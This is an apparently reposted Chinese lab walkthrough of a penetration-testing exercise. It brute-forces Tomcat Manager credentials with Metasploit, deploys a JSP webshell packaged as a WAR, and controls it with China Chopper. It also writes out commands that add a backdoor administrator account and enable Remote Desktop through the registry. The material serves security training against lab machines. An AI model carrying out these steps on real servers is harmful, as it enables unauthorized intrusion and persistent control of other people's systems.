作者:怦然欣动and败 | 来源:互联网 | 2023-05-17 23:22
本文主要介绍关于tomcat,servlet,java,web安全,linux的知识点,对【网络安全——WAR后门部署】和【互联网网络安全吗】有兴趣的朋友可以看下由【Beluga】投稿的技术文章,希
本文主要介绍关于tomcat,servlet,java,web安全,linux的知识点,对【网络安全——WAR后门部署】和【互联网网络安全吗】有兴趣的朋友可以看下由【Beluga】投稿的技术文章,希望该技术和经验能帮到你解决你所遇的综合渗透测试相关技术问题。
互联网网络安全吗
综合渗透测试-WAR后门部署
第一步,打开网络拓扑,启动实验虚拟机,分别查看虚拟机IP地址:
Kali Linux
Windows 7
Windows 7-1:
第二步,在Windows 7-1靶机中运行Tomcat:
桌面-apache-tomcat-9.0.29-bin-双击startup.bat
第三步,切换至渗透机Kali Linux,使用浏览器访问靶机的Tomcat服务:
http://172.16.1.200:8080(靶机IP地址)
第四步,点击页面中的“Manager App”,被要求输入用户名和密码:
第五步,打开终端,运行msfconsole。使用Tomcat密码破解模块破解Tomcat的密码:
我们设置用户名为Tomcat默认的“tomcat”,使用密码字典“/root/dict.txt”。
运行命令后,得到Tomcat后台的管理员用户名:tomcat,密码:s3cret。
第六步,切换至Windows 7渗透机,访问靶机的Tomcat服务:
http://172.16.1.200:8080
第七步,点击“Manager App”按钮,输入用户名tomcat,密码s3cret,登录至管理页面
第八步,将桌面上的JSP一句话木马打包。右键torjan.jsp-添加到“torjan.zip”:
第九步,将torjan.zip重命名为torjan.war
第十步,回到Tomcat管理页面,在“要部署的WAR文件”处,上传刚刚压缩的torjan.war
第十一步,点击部署后,访问部署的jsp文件所在位置:
http://172.16.1.200:8080/torjan/torjan.jsp
第十二步,打开桌面上2011caidao文件夹,双击chopper.exe启动中国菜刀
第十三步,右键菜刀空白处-添加-设置地址为torjan.jsp的地址,密码为pass,点击添加:
第十四步,双击添加后的地址,访问靶机的文件管理器:
成功读取靶机中的文件。
第十五步,返回主页,右键地址-虚拟终端
第十六步,在终端中添加用户hacker,密码123456,并将用户设置为管理员:
net user hacker 123456 /add
net localgroup administrators hacker /add
第十七步,开启靶机远程桌面功能:
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
第十八步,在Windows 7渗透机按Win+R键或点击开始菜单-运行,输入mstsc
第十九步,输入服务器IP地址后点击连接
第二十步,登录hacker/123456
第二十一步,进入远程桌面,打开cmd,输入net user hacker
至此提权成功。
本文《网络安全——WAR后门部署》版权归Beluga所有,引用网络安全——WAR后门部署需遵循CC 4.0 BY-SA版权协议。